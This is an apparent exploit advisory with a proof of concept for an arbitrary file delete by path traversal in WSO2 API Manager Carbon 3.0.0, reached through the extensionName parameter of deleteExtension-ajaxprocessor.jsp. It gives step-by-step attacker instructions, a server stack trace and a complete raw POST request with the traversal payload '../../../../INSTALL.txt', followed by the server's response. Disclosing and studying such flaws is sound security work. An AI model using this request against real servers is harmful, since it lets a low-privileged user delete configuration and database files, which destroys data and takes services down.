WSO2 API Manager Carbon Interface 3.0.0 File Delete

`Document Title:  
===============  
WOS2 API Manager(Delete Extension) Arbitrary File Delete(Path traversal )  
  
  
##CVE not assigned yet  
##Author : Raki Ben Hamouda  
##Security Update : https://apim.docs.wso2.com/en/latest/  
  
  
Common Vulnerability Scoring System:  
====================================  
8.5  
  
  
Affected Product(s):  
====================  
WSO2 API Manager Carbon Interface  
  
Exploitation Technique:  
=======================  
Remote  
  
  
Severity Level:  
===============  
High  
  
  
Technical Details & Description:  
================================  
A remote Arbitrary file delete vulnerability has been discovered in the  
official WSO2 API Manager Carbon UI product .  
The security vulnerability allows a remote attacker with low privileges to  
perform authenticated application requests  
and to delete arbitrary System files.  
  
The vulnerability is located in the  
`/carbon/extensions/deleteExtension-ajaxprocessor.jsp` modules and the  
`extensionName` parameter  
of the extension we want to delete. Remote attackers are able to delete  
arbitrary files as configuration files ,database(.db) files  
via authenticated POST method requests with a crafted String arbitrary  
traversal files names in "extensionName" .  
  
The security risk of the arbitrary delete vulnerability is estimated as  
High with a cvss (common vulnerability scoring system) count of 8.5.  
Exploitation of the Path traversal vulnerability requires a low privilege  
web-application user account and no user interaction.  
Successful exploitation of the vulnerability results in loss of  
availability, integrity and confidentiality.  
  
===============================  
  
Error Generated by Server in case of file not found from 'logfile' (  
broughts my atttention ...)  
  
[2020-01-04 01:40:43,318] ERROR - ResourceServiceClient Failed to remove  
extension.  
org.apache.axis2.AxisFault: File does not exist:  
E:\api-wso2\bin\..\repository\d  
eployment\server\registryextensions\commons-dir  
at  
org.apache.axis2.util.Utils.getInboundFaultFromMessageContext(Utils.j  
ava:531) ~[axis2_1.6.1.wso2v38.jar:?]  
at  
org.apache.axis2.description.OutInAxisOperationClient.handleResponse(  
OutInAxisOperation.java:382) ~[axis2_1.6.1.wso2v38.jar:?]  
at  
org.apache.axis2.description.OutInAxisOperationClient.send(OutInAxisO  
peration.java:457) ~[axis2_1.6.1.wso2v38.jar:?]  
at  
org.apache.axis2.description.OutInAxisOperationClient.executeImpl(Out  
InAxisOperation.java:228) ~[axis2_1.6.1.wso2v38.jar:?]  
at  
org.apache.axis2.client.OperationClient.execute(OperationClient.java:  
149) ~[axis2_1.6.1.wso2v38.jar:?]  
at  
org.wso2.carbon.registry.extensions.stub.ResourceAdminServiceStub.rem  
oveExtension(ResourceAdminServiceStub.java:5954)  
~[org.wso2.carbon.registry.exte  
nsions.stub_4.7.13.jar:?]  
at  
org.wso2.carbon.registry.extensions.ui.clients.ResourceServiceClient.  
deleteExtension(ResourceServiceClient.java:137)  
[org.wso2.carbon.registry.extens  
ions.ui_4.7.13.jar:?]  
at  
org.apache.jsp.extensions.deleteExtension_002dajaxprocessor_jsp._jspS  
ervice(deleteExtension_002dajaxprocessor_jsp.java:139) [hc_795974301/:?]  
at  
org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70) [t  
omcat_9.0.22.wso2v1.jar:?]  
  
*Error displayed in Web browser with body request:  
  
<script type="text/javascript">  
CARBON.showErrorDialog("File does not exist:  
E:\api-wso2\bin\..\repository\deployment\server\registryextensions\nofile.jar");  
</script>  
  
  
  
=============================  
  
Request Method(s):  
[+] POST  
  
Vulnerable Module(s):  
[+] /carbon/extensions/deleteExtension-ajaxprocessor.jsp  
  
Vulnerable Parameter(s):  
[+] extensionName  
  
  
Server version  
3.0.0  
  
  
Proof of Concept (PoC):  
=======================  
The security vulnerability can be exploited by remote attackers with low  
privileged web-application user account and with no user interaction.  
For security demonstration or to reproduce the vulnerability follow the  
provided information and steps below to continue.  
  
  
1-Attacker must have access to the Extension component(List ,Add ,Delete  
extensions )  
2-attacker uploads any file .jar extension  
3-attacker intercepts the request that follows and modifies the parameter  
with traversal string:  
  
--- PoC Session Logs [POST] ---  
  
POST /carbon/extensions/deleteExtension-ajaxprocessor.jsp HTTP/1.1  
Host: localhost:9443  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:71.0)  
Gecko/20100101 Firefox/71.0  
Accept: text/javascript, text/html, application/xml, text/xml, */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
X-Requested-With: XMLHttpRequest, XMLHttpRequest  
X-Prototype-Version: 1.5.0  
Content-type: application/x-www-form-urlencoded; charset=UTF-8  
X-CSRF-Token: 0OQG-MM0W-1CY9-K503-1X3I-J4M1-YF2Z-J4NS  
Content-Length: 22  
Origin: https://localhost:9443  
Connection: close  
Referer:  
https://localhost:9443/carbon/extensions/list_extensions.jsp?region=region3&item=list_extensions_menu  
Cookie: JSESSIONID=BD1005351C7DC1E70CA763D5EBD5390B;  
requestedURI=../../carbon/functions-library-mgt/functions-library-mgt-add.jsp?region=region1&item=function_libraries_add;  
region1_configure_menu=none; region3_registry_menu=visible;  
region4_monitor_menu=none; region5_tools_menu=none;  
current-breadcrumb=extensions_menu%252Clist_extensions_menu%2523;  
MSG15780931689110.08734318816834985=true;  
MSG15780932448520.1389658752202746=true;  
MSG15780934638710.11615678726759582=true;  
MSG15780941514590.39351165459685944=true;  
MSG15780941548760.1587776077002745=true;  
MSG15780944563770.9802725740232142=true;  
MSG15780944882480.28388839177015013=true;  
MSG15780945113520.5908842754830942=true; menuPanel=visible;  
menuPanelType=extensions  
Pragma: no-cache  
Cache-Control: no-cache  
  
extensionName=../../../../INSTALL.txt  
  
---------------Returned Headers in Response------------------  
  
HTTP/1.1 200  
X-Content-Type-Options: nosniff  
X-XSS-Protection: 1; mode=block  
X-Frame-Options: DENY  
Content-Type: text/html;charset=UTF-8  
Content-Length: 10  
Date: Sat, 04 Jan 2020 00:55:38 GMT  
Connection: close  
Server: WSO2 Carbon Server  
`